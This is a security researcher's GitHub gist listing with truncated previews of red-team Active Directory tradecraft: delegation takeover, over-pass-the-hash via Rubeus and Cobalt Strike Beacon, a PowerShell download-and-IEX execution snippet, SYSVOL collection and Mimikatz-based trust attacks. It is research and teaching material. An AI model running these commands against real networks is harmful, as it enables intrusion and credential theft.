Skip to content

Instantly share code, notes, and snippets.

geeking out about Kerberos

Will HarmJ0y

geeking out about Kerberos
View GitHub Profile
HarmJ0y / rbcd_demo.ps1
Last active Sep 8, 2020
Resource-based constrained delegation computer DACL takeover demo
View rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Oct 15, 2020
Over-pass-the-hash with Rubeus and Beacon
View gist:dc379107cfb4aa7ef5c3ecbac0133a02
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
HarmJ0y / New-SYSVOLZip.ps1
Created Aug 8, 2017
Compresses all of SYSVOL to a local .zip file.
View New-SYSVOLZip.ps1
function New-SYSVOLZip {
Compresses all folders/files in SYSVOL to a .zip file.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View DPAPI.ps1
Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('')
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Oct 26, 2020
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View Get-NonstandardService.ps1
function Get-NonstandardService {
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View powershell_talks.txt
BSides LV 2015 - "Building an Empire with PowerShell" -
BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" -
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" -
PowerShell Summit 2016 - "Digital Forensics with PowerShell" -
BSides LV 2016 - "Building an EmPyre with Python" -
DerbyCon 2016 - "A Year in the Empire" -
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active Sep 16, 2019
View ConvertFrom-UserParameter.ps1
function ConvertFrom-UserParameter {
Converts a userparameters encoded blob into an ordered dictionary of decoded values.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
HarmJ0y / 44con_demo.ps1
Created Sep 17, 2016
Demo for the 44con "Trusts You Might Have Missed" presentation
View 44con_demo.ps1
# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1
# map all reachable domain trusts
# enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName
You can’t perform that action at this time.